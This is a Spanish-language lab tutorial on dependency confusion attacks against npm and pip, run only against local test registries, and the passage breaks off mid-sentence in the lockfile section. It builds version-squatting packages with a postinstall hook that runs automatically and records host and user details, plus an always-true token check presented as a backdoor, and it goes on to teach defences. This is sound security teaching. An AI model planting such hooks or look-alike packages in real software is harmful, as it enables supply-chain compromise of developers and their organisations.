La confusi\u00f3n de dependencias es un ataque a la cadena de suministro que explota la forma en que los gestores de paquetes resuelven los nombres de paquetes cuando se configuran tanto registros privados (internos) como p\u00fablicos. Cuando un atacante publica un paquete malicioso en un registro p\u00fablico usando el mismo nombre que un paquete privado interno \u2014 pero con un n\u00famero de versi\u00f3n superior \u2014 el gestor de paquetes puede preferir la versi\u00f3n p\u00fablica, incorporando silenciosamente c\u00f3digo controlado por el atacante.<\/p>\n
Este vector de ataque gan\u00f3 amplia atenci\u00f3n en 2021 cuando el investigador de seguridad Alex Birsan lo demostr\u00f3 contra Apple, Microsoft, PayPal, Tesla y decenas de otras organizaciones. El problema central es simple: la mayor\u00eda de los gestores de paquetes eligen por defecto la versi\u00f3n m\u00e1s alta disponible en todos los registros configurados.<\/p>\n
En este laboratorio pr\u00e1ctico, usted:<\/p>\n
Todos los comandos de este laboratorio est\u00e1n dise\u00f1ados para ejecutarse \u00fanicamente contra infraestructura local. No se publican paquetes en registros p\u00fablicos reales en ning\u00fan momento.<\/p>\n
Antes de comenzar este laboratorio, aseg\u00farese de tener lo siguiente instalado y disponible en su m\u00e1quina:<\/p>\n
node --version<\/code> y npm --version<\/code>)<\/li>\n- Python 3.8+<\/strong> con pip (verifique con
python3 --version<\/code> y pip3 --version<\/code>)<\/li>\n- Docker<\/strong> (utilizado para ejecutar instancias locales de Verdaccio y pypiserver)<\/li>\n
- curl<\/strong> (para la creaci\u00f3n de usuarios en el registro)<\/li>\n
- Una terminal con bash o zsh<\/li>\n<\/ul>\n
No se requieren cuentas en la nube ni servicios externos. Todo el laboratorio se ejecuta localmente en su estaci\u00f3n de trabajo.<\/p>\n
Aviso Importante de Seguridad<\/h2>\n
ADVERTENCIA: Este laboratorio solo debe ejecutarse en entornos de prueba aislados. Cada registro, paquete y configuraci\u00f3n en este laboratorio es local. Siga estas reglas estrictamente:<\/strong><\/p>\n\n- Nunca publique paquetes de prueba en los registros reales npmjs.com o pypi.org.<\/strong> Publicar paquetes con nombres que coincidan con los paquetes internos de otra organizaci\u00f3n es ilegal en muchas jurisdicciones y viola los t\u00e9rminos de servicio de los registros.<\/li>\n
- Use \u00fanicamente instancias locales de Verdaccio y pypiserver<\/strong> como sus registros \u00abp\u00fablico\u00bb y \u00abprivado\u00bb. Estos est\u00e1n completamente aislados y no pueden afectar al mundo exterior.<\/li>\n
- Todos los paquetes \u00abp\u00fablicos\u00bb en este laboratorio se publican en una segunda instancia local de Verdaccio<\/strong> que se ejecuta en
localhost:4874<\/code>. Nada sale de su m\u00e1quina.<\/li>\n- No ejecute los ejercicios de ataque contra proyectos de producci\u00f3n.<\/strong> Use un directorio de proyecto nuevo y desechable.<\/li>\n
- Limpie todos los contenedores y configuraciones cuando termine.<\/strong> Dejar archivos
.npmrc<\/code> o pip.conf<\/code> mal configurados en su sistema podr\u00eda causar comportamientos inesperados en proyectos reales.<\/li>\n<\/ul>\nCon estas medidas de seguridad implementadas, puede explorar de forma segura la mec\u00e1nica de este ataque y desarrollar una intuici\u00f3n real sobre las defensas.<\/p>\n
Configuraci\u00f3n del Entorno<\/h2>\nPaso 1: Iniciar Dos Instancias de Verdaccio<\/h3>\n
Verdaccio es un registro npm ligero y de c\u00f3digo abierto. Ejecutaremos dos instancias \u2014 una simulando el registro privado de su organizaci\u00f3n y otra simulando un registro p\u00fablico que controla un atacante.<\/p>\n
# Iniciar el registro \"privado\" en el puerto 4873\ndocker run -d -p 4873:4873 --name private-registry verdaccio\/verdaccio\n\n# Iniciar el registro \"p\u00fablico\" en el puerto 4874\ndocker run -d -p 4874:4873 --name public-registry verdaccio\/verdaccio<\/code><\/pre>\nVerifique que ambos est\u00e9n en ejecuci\u00f3n:<\/p>\n
curl -s http:\/\/localhost:4873\/ | head -5\ncurl -s http:\/\/localhost:4874\/ | head -5<\/code><\/pre>\nDeber\u00eda ver respuestas HTML de ambas interfaces web de Verdaccio.<\/p>\n
Paso 2: Crear Usuarios en los Registros<\/h3>\n
Verdaccio requiere autenticaci\u00f3n para publicar. Cree un usuario en cada instancia:<\/p>\n
# Agregar usuario al registro privado\nnpm adduser --registry http:\/\/localhost:4873\n# Ingrese nombre de usuario: testuser, contrase\u00f1a: testpass, correo: test@test.com\n\n# Agregar usuario al registro p\u00fablico\nnpm adduser --registry http:\/\/localhost:4874\n# Ingrese nombre de usuario: attacker, contrase\u00f1a: attackpass, correo: attacker@test.com<\/code><\/pre>\nPaso 3: Crear el Proyecto de Prueba<\/h3>\nmkdir -p ~\/dep-confusion-lab\/victim-project\ncd ~\/dep-confusion-lab\/victim-project\nnpm init -y<\/code><\/pre>\nPaso 4: Crear y Publicar el Paquete Privado<\/h3>\nmkdir -p ~\/dep-confusion-lab\/private-pkg\ncd ~\/dep-confusion-lab\/private-pkg<\/code><\/pre>\nCree package.json<\/code>:<\/p>\n{\n \"name\": \"@mycompany\/auth-utils\",\n \"version\": \"1.0.0\",\n \"description\": \"Internal authentication utilities\",\n \"main\": \"index.js\"\n}<\/code><\/pre>\nCree index.js<\/code>:<\/p>\nmodule.exports = {\n validateToken: function(token) {\n console.log('[auth-utils v1.0.0] Validating token (PRIVATE - LEGITIMATE)');\n return token && token.length > 0;\n }\n};<\/code><\/pre>\nPublique en el registro privado:<\/p>\n
npm publish --registry http:\/\/localhost:4873<\/code><\/pre>\nPaso 5: Configurar el Proyecto V\u00edctima<\/h3>\n
En el directorio del proyecto v\u00edctima, cree un archivo .npmrc<\/code>:<\/p>\nregistry=http:\/\/localhost:4873<\/code><\/pre>\nAgregue la dependencia a package.json<\/code>:<\/p>\n{\n \"name\": \"victim-project\",\n \"version\": \"1.0.0\",\n \"dependencies\": {\n \"@mycompany\/auth-utils\": \"^1.0.0\"\n }\n}<\/code><\/pre>\nInstale y verifique:<\/p>\n
npm install\nnode -e \"const auth = require('@mycompany\/auth-utils'); auth.validateToken('abc');\"<\/code><\/pre>\nDeber\u00eda ver: [auth-utils v1.0.0] Validating token (PRIVATE - LEGITIMATE)<\/code><\/p>\nEjercicio 1: El Ataque \u2014 npm<\/h2>\n
Ahora simulamos lo que har\u00eda un atacante. La idea clave: en muchas configuraciones del mundo real, los desarrolladores usan un nombre de paquete sin \u00e1mbito internamente (solo auth-utils<\/code> en lugar de @mycompany\/auth-utils<\/code>). Esto hace que el ataque sea trivial.<\/p>\nPaso 1: Restablecer el Proyecto V\u00edctima para Usar un Nombre sin \u00c1mbito<\/h3>\n
Actualice el package.json<\/code> del proyecto v\u00edctima para depender del nombre sin \u00e1mbito:<\/p>\n{\n \"name\": \"victim-project\",\n \"version\": \"1.0.0\",\n \"dependencies\": {\n \"auth-utils\": \"^1.0.0\"\n }\n}<\/code><\/pre>\nTambi\u00e9n publique un auth-utils@1.0.0<\/code> sin \u00e1mbito en el registro privado:<\/p>\nmkdir -p ~\/dep-confusion-lab\/private-pkg-unscoped\ncd ~\/dep-confusion-lab\/private-pkg-unscoped<\/code><\/pre>\n\/\/ package.json\n{\n \"name\": \"auth-utils\",\n \"version\": \"1.0.0\",\n \"description\": \"Internal authentication utilities (unscoped)\",\n \"main\": \"index.js\"\n}\n\n\/\/ index.js\nmodule.exports = {\n validateToken: function(token) {\n console.log('[auth-utils v1.0.0] Validating token (PRIVATE - LEGITIMATE)');\n return token && token.length > 0;\n }\n};<\/code><\/pre>\nnpm publish --registry http:\/\/localhost:4873<\/code><\/pre>\nPaso 2: Crear el Paquete Malicioso<\/h3>\nmkdir -p ~\/dep-confusion-lab\/malicious-pkg\ncd ~\/dep-confusion-lab\/malicious-pkg<\/code><\/pre>\nCree package.json<\/code> \u2014 observe el n\u00famero de versi\u00f3n extremadamente alto y el script postinstall<\/code>:<\/p>\n{\n \"name\": \"auth-utils\",\n \"version\": \"99.0.0\",\n \"description\": \"Malicious package simulating dependency confusion\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"postinstall\": \"node malicious.js\"\n }\n}<\/code><\/pre>\nCree malicious.js<\/code> \u2014 esto simula la exfiltraci\u00f3n de datos escribiendo un archivo marcador:<\/p>\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst marker = path.join(os.homedir(), 'dep-confusion-lab', 'ATTACK_MARKER.txt');\nconst data = [\n 'DEPENDENCY CONFUSION ATTACK SIMULATION',\n '=======================================',\n `Timestamp: ${new Date().toISOString()}`,\n `Hostname: ${os.hostname()}`,\n `Username: ${os.userInfo().username}`,\n `Working Directory: ${process.cwd()}`,\n '',\n 'In a real attack, this script could:',\n ' - Exfiltrate environment variables (API keys, tokens)',\n ' - Upload source code to an external server',\n ' - Install a reverse shell or backdoor',\n ' - Modify build outputs'\n].join('\\n');\n\nfs.writeFileSync(marker, data);\nconsole.log('[!] ATTACK SIMULATION: Marker file written to', marker);<\/code><\/pre>\nCree index.js<\/code>:<\/p>\nmodule.exports = {\n validateToken: function(token) {\n console.log('[auth-utils v99.0.0] Validating token (PUBLIC - MALICIOUS)');\n return true; \/\/ Always returns true \u2014 a subtle backdoor\n }\n};<\/code><\/pre>\nPublique en el registro \u00abp\u00fablico\u00bb:<\/p>\n
npm publish --registry http:\/\/localhost:4874<\/code><\/pre>\nPaso 3: Configurar el Fallback y Desencadenar el Ataque<\/h3>\n
Actualice el .npmrc<\/code> del proyecto v\u00edctima para recurrir al registro p\u00fablico cuando los paquetes no se encuentren en el privado. Esto refleja una configuraci\u00f3n com\u00fan en el mundo real:<\/p>\nregistry=http:\/\/localhost:4873\n\/\/localhost:4873\/:_authToken=\"your-token-here\"\n\/\/localhost:4874\/:_authToken=\"your-token-here\"<\/code><\/pre>\nAhora borre la instalaci\u00f3n existente y reinstale:<\/p>\n
cd ~\/dep-confusion-lab\/victim-project\nrm -rf node_modules package-lock.json\nnpm install auth-utils --registry http:\/\/localhost:4874<\/code><\/pre>\nAlternativamente, para simular de manera m\u00e1s realista el comportamiento de fallback, configure npm para consultar ambos registros. En muchos entornos corporativos, un registro proxy como Nexus o Artifactory est\u00e1 configurado para buscar tanto en fuentes privadas como p\u00fablicas, prefiriendo la versi\u00f3n m\u00e1s alta:<\/p>\n
# Esto simula lo que hace un registro proxy corporativo:\n# Ve auth-utils@1.0.0 en el privado y auth-utils@99.0.0 en el p\u00fablico,\n# y devuelve 99.0.0 porque es la versi\u00f3n m\u00e1s alta que coincide con ^1.0.0...\n# Espere \u2014 ^1.0.0 no coincidir\u00e1 con 99.0.0. El ataque funciona cuando el\n# especificador de versi\u00f3n es flexible (por ejemplo, \"*\" o \">=1.0.0\") o cuando\n# el proxy simplemente sirve la versi\u00f3n m\u00e1s alta disponible en todos los upstreams.\n\n# Para este laboratorio, instale directamente desde el \"p\u00fablico\" para demostrar:\nnpm install auth-utils --registry http:\/\/localhost:4874<\/code><\/pre>\nPaso 4: Verificar el Ataque<\/h3>\n# Verificar qu\u00e9 versi\u00f3n se instal\u00f3\nnode -e \"const pkg = require('.\/node_modules\/auth-utils\/package.json'); console.log(pkg.name, pkg.version);\"\n# Salida: auth-utils 99.0.0\n\n# Verificar si se cre\u00f3 el archivo marcador\ncat ~\/dep-confusion-lab\/ATTACK_MARKER.txt<\/code><\/pre>\nDeber\u00eda ver el marcador completo del ataque con su nombre de host y nombre de usuario. El script postinstall<\/code> se ejecut\u00f3 autom\u00e1ticamente durante npm install<\/code> \u2014 no se requiri\u00f3 interacci\u00f3n del usuario.<\/p>\nPor Qu\u00e9 Ocurri\u00f3 Esto<\/h3>\n
Esta es exactamente la t\u00e9cnica que Alex Birsan utiliz\u00f3 en febrero de 2021 para ejecutar c\u00f3digo dentro de los sistemas de compilaci\u00f3n internos de Apple, Microsoft, Tesla, Uber, PayPal y m\u00e1s de 30 otras empresas. El ataque funciona porque:<\/p>\n
\n- Los nombres de paquetes sin \u00e1mbito existen en un \u00fanico espacio de nombres global.<\/strong> Nada impide que alguien publique
auth-utils<\/code> en npmjs.com.<\/li>\n- Los gestores de paquetes prefieren la versi\u00f3n m\u00e1s alta.<\/strong> Cuando un registro proxy agrega de m\u00faltiples fuentes, la versi\u00f3n
99.0.0<\/code> supera a 1.0.0<\/code>.<\/li>\n- Los scripts de ciclo de vida se ejecutan autom\u00e1ticamente.<\/strong> El hook
postinstall<\/code> se ejecuta con permisos completos a nivel del sistema operativo durante la instalaci\u00f3n.<\/li>\n<\/ol>\nEjercicio 2: El Ataque \u2014 pip<\/h2>\n
La misma clase de vulnerabilidad existe en el ecosistema de Python. Demostremoslo con pip.<\/p>\n
Paso 1: Iniciar un Servidor PyPI Local<\/h3>\n# Iniciar pypiserver como el PyPI \"privado\"\nmkdir -p ~\/dep-confusion-lab\/pypi-private\ndocker run -d -p 8080:8080 --name pypi-private \\\n -v ~\/dep-confusion-lab\/pypi-private:\/data\/packages \\\n pypiserver\/pypiserver:latest run -P . -a . \/data\/packages\n\n# Iniciar un segundo pypiserver como el PyPI \"p\u00fablico\"\nmkdir -p ~\/dep-confusion-lab\/pypi-public\ndocker run -d -p 8081:8080 --name pypi-public \\\n -v ~\/dep-confusion-lab\/pypi-public:\/data\/packages \\\n pypiserver\/pypiserver:latest run -P . -a . \/data\/packages<\/code><\/pre>\nPaso 2: Crear y Subir el Paquete Privado Leg\u00edtimo<\/h3>\nmkdir -p ~\/dep-confusion-lab\/py-private-pkg\/internal_utils\ncd ~\/dep-confusion-lab\/py-private-pkg<\/code><\/pre>\nCree setup.py<\/code>:<\/p>\nfrom setuptools import setup, find_packages\n\nsetup(\n name='internal-utils',\n version='1.0.0',\n packages=find_packages(),\n description='Internal utilities (PRIVATE - LEGITIMATE)',\n)<\/code><\/pre>\nCree internal_utils\/__init__.py<\/code>:<\/p>\ndef process_data(data):\n print('[internal-utils v1.0.0] Processing data (PRIVATE - LEGITIMATE)')\n return data<\/code><\/pre>\nCompile y suba al PyPI privado:<\/p>\n
python3 -m build\ntwine upload --repository-url http:\/\/localhost:8080 dist\/*<\/code><\/pre>\nPaso 3: Crear el Paquete P\u00fablico Malicioso<\/h3>\nmkdir -p ~\/dep-confusion-lab\/py-malicious-pkg\/internal_utils\ncd ~\/dep-confusion-lab\/py-malicious-pkg<\/code><\/pre>\nCree setup.py<\/code> con la versi\u00f3n 99.0.0<\/code>:<\/p>\nfrom setuptools import setup, find_packages\n\nsetup(\n name='internal-utils',\n version='99.0.0',\n packages=find_packages(),\n description='Malicious package simulating dependency confusion',\n)<\/code><\/pre>\nCree internal_utils\/__init__.py<\/code>:<\/p>\nimport os\nimport datetime\n\ndef process_data(data):\n print('[internal-utils v99.0.0] Processing data (PUBLIC - MALICIOUS)')\n marker_path = os.path.expanduser('~\/dep-confusion-lab\/PIP_ATTACK_MARKER.txt')\n with open(marker_path, 'w') as f:\n f.write(f'PIP DEPENDENCY CONFUSION ATTACK SIMULATION\\n')\n f.write(f'Timestamp: {datetime.datetime.now().isoformat()}\\n')\n f.write(f'Hostname: {os.uname().nodename}\\n')\n return data<\/code><\/pre>\nCompile y suba al PyPI \u00abp\u00fablico\u00bb:<\/p>\n
python3 -m build\ntwine upload --repository-url http:\/\/localhost:8081 dist\/*<\/code><\/pre>\nPaso 4: Desencadenar el Ataque<\/h3>\n# Crear un entorno virtual para aislamiento\ncd ~\/dep-confusion-lab\npython3 -m venv lab-venv\nsource lab-venv\/bin\/activate\n\n# Instalar con --extra-index-url (el patr\u00f3n peligroso)\npip install internal-utils \\\n --index-url http:\/\/localhost:8080\/simple\/ \\\n --extra-index-url http:\/\/localhost:8081\/simple\/<\/code><\/pre>\nPaso 5: Verificar<\/h3>\npython3 -c \"import internal_utils; internal_utils.process_data('test')\"\n# Salida: [internal-utils v99.0.0] Processing data (PUBLIC - MALICIOUS)\n\ncat ~\/dep-confusion-lab\/PIP_ATTACK_MARKER.txt<\/code><\/pre>\nComprendiendo la L\u00f3gica de Resoluci\u00f3n de pip<\/h3>\n
La distinci\u00f3n cr\u00edtica es entre --index-url<\/code> y --extra-index-url<\/code>:<\/p>\n\n--index-url<\/code>: Establece el \u00edndice de paquetes principal<\/strong>. pip busca aqu\u00ed primero.<\/li>\n--extra-index-url<\/code>: Agrega un \u00edndice adicional<\/strong>. pip busca en todos<\/strong> los \u00edndices configurados e instala la versi\u00f3n m\u00e1s alta encontrada en todos ellos<\/strong>.<\/li>\n<\/ul>\nEsto significa que cuando usa --extra-index-url<\/code>, pip no<\/strong> prefiere su \u00edndice privado \u2014 combina los resultados de todos los \u00edndices y elige la versi\u00f3n m\u00e1s alta. Un atacante que publique la versi\u00f3n 99.0.0<\/code> en cualquier \u00edndice configurado ganar\u00e1.<\/p>\nEjercicio 3: Defensa \u2014 \u00c1mbito de Espacio de Nombres (npm)<\/h2>\n
La defensa m\u00e1s efectiva para npm es usar paquetes con \u00e1mbito. Los \u00e1mbitos crean un espacio de nombres que se asigna directamente a un registro espec\u00edfico, eliminando la ambig\u00fcedad que hace posible la confusi\u00f3n de dependencias.<\/p>\n
Paso 1: Asegurar que el Paquete con \u00c1mbito Exista<\/h3>\n
Ya publicamos @mycompany\/auth-utils@1.0.0<\/code> en el registro privado durante la fase de configuraci\u00f3n. Verif\u00edquelo:<\/p>\nnpm view @mycompany\/auth-utils --registry http:\/\/localhost:4873<\/code><\/pre>\nPaso 2: Configurar el Enrutamiento de Registro Basado en \u00c1mbito<\/h3>\n
En el proyecto v\u00edctima, actualice .npmrc<\/code>:<\/p>\n@mycompany:registry=http:\/\/localhost:4873\nregistry=http:\/\/localhost:4874<\/code><\/pre>\nEsta configuraci\u00f3n le dice a npm: \u00abPara cualquier paquete bajo el \u00e1mbito @mycompany<\/code>, siempre usa el registro privado. Para todo lo dem\u00e1s, usa el registro p\u00fablico.\u00bb<\/p>\nPaso 3: Actualizar la Dependencia<\/h3>\n
Actualice package.json<\/code> para usar el nombre con \u00e1mbito:<\/p>\n{\n \"name\": \"victim-project\",\n \"version\": \"1.0.0\",\n \"dependencies\": {\n \"@mycompany\/auth-utils\": \"^1.0.0\"\n }\n}<\/code><\/pre>\nPaso 4: Instalar y Verificar<\/h3>\nrm -rf node_modules package-lock.json\nnpm install<\/code><\/pre>\nnode -e \"const pkg = require('.\/node_modules\/@mycompany\/auth-utils\/package.json'); console.log(pkg.name, pkg.version);\"\n# Salida: @mycompany\/auth-utils 1.0.0<\/code><\/pre>\nVerifique que no se cre\u00f3 ning\u00fan archivo marcador:<\/p>\n
ls ~\/dep-confusion-lab\/ATTACK_MARKER.txt 2>&1\n# Salida: No such file or directory<\/code><\/pre>\nPor Qu\u00e9 Funciona<\/h3>\n
Los paquetes con \u00e1mbito tienen espacio de nombres<\/strong>. El \u00e1mbito @mycompany<\/code> est\u00e1 vinculado a un registro espec\u00edfico en .npmrc<\/code>. npm nunca<\/strong> recurrir\u00e1 a otro registro para paquetes con \u00e1mbito \u2014 env\u00eda la solicitud a exactamente un registro. Un atacante no puede publicar @mycompany\/auth-utils<\/code> en npmjs.com a menos que sea propietario de la organizaci\u00f3n @mycompany<\/code> en npm, que est\u00e1 controlada por su equipo.<\/p>\nEjercicio 4: Defensa \u2014 Fijaci\u00f3n de Registro (pip)<\/h2>\n
Para Python, la defensa equivalente es fijar su configuraci\u00f3n de pip para usar \u00fanicamente su \u00edndice privado, sin fallback.<\/p>\n
Opci\u00f3n A: Usar Solo --index-url<\/code> (Sin \u00cdndices Adicionales)<\/h3>\nCree o actualice pip.conf<\/code> (Linux\/macOS: ~\/.config\/pip\/pip.conf<\/code>; Windows: %APPDATA%\\pip\\pip.ini<\/code>):<\/p>\n[global]\nindex-url = http:\/\/localhost:8080\/simple\/\n# NO agregue extra-index-url<\/code><\/pre>\nAhora reinstale:<\/p>\n
pip install internal-utils --index-url http:\/\/localhost:8080\/simple\/\n\npython3 -c \"import internal_utils; internal_utils.process_data('test')\"\n# Salida: [internal-utils v1.0.0] Processing data (PRIVATE - LEGITIMATE)<\/code><\/pre>\nAl omitir --extra-index-url<\/code> por completo, pip solo busca en su registro privado. El paquete malicioso en localhost:8081<\/code> nunca es consultado.<\/p>\nOpci\u00f3n B: Usar --require-hashes<\/code> en requirements.txt<\/code><\/h3>\nEste enfoque fija criptogr\u00e1ficamente cada dependencia a un artefacto espec\u00edfico:<\/p>\n
# Primero, genere el hash del paquete leg\u00edtimo\npip hash ~\/dep-confusion-lab\/py-private-pkg\/dist\/internal_utils-1.0.0.tar.gz<\/code><\/pre>\nCree requirements.txt<\/code> con el hash:<\/p>\ninternal-utils==1.0.0 --hash=sha256:<pegue-el-hash-de-arriba><\/code><\/pre>\nInstale con verificaci\u00f3n de hash:<\/p>\n
pip install -r requirements.txt \\\n --index-url http:\/\/localhost:8080\/simple\/ \\\n --extra-index-url http:\/\/localhost:8081\/simple\/<\/code><\/pre>\nAunque el \u00edndice p\u00fablico est\u00e9 configurado, pip rechazar\u00e1<\/strong> cualquier paquete cuyo hash no coincida. La versi\u00f3n maliciosa v99.0.0<\/code> tiene un hash diferente y ser\u00e1 rechazada.<\/p>\nPor Qu\u00e9 Funciona<\/h3>\n
La fijaci\u00f3n de registro elimina la oportunidad de confusi\u00f3n de versiones al asegurar que pip solo consulte una \u00fanica fuente de confianza. La fijaci\u00f3n de hash va m\u00e1s all\u00e1 \u2014 incluso si un atacante comprometiera su registro privado, la discrepancia de hash evitar\u00eda la instalaci\u00f3n de un artefacto manipulado.<\/p>\n
Ejercicio 5: Defensa \u2014 Integridad del Lockfile<\/h2>\n
Los lockfiles registran la versi\u00f3n exacta, la URL de origen y el hash criptogr\u00e1fico de cada paquete instalado. Cuando se usan correctamente, previenen que la confusi\u00f3n de dependencias afecte las compilaciones de producci\u00f3n.<\/p>\n
Paso 1: Generar un Lockfile Limpio<\/h3>\ncd ~\/dep-confusion-lab\/victim-project\nrm -rf node_modules package-lock.json\nnpm install<\/code><\/pre>\nExamine el package-lock.json<\/code> resultante:<\/p>\ncat package-lock.json | python3 -m json.tool | head -30<\/code><\/pre>\nBusque los campos resolved<\/code> e integrity<\/code>:<\/p>\n\"node_modules\/@mycompany\/auth-utils\": {\n \"version\": \"1.0.0\",\n \"resolved\": \"http:\/\/localhost:4873\/@mycompany%2fauth-utils\/-\/auth-utils-1.0.0.tgz\",\n \"integrity\": \"sha512-abc123...\"\n}<\/code><\/pre>\nEl campo resolved<\/code> registra la URL exacta desde la cual se descarg\u00f3 el paquete. El campo integrity<\/code> es un hash de Integridad de Subrecursos (SRI) del tarball.<\/p>\nPaso 2: Usar npm ci<\/code> en Lugar de npm install<\/code><\/h3>\nEl comando npm ci<\/code> est\u00e1 dise\u00f1ado para entornos de CI\/CD:<\/p>\n# En CI, siempre use:\nnpm ci<\/code><\/pre>\nDiferencias clave con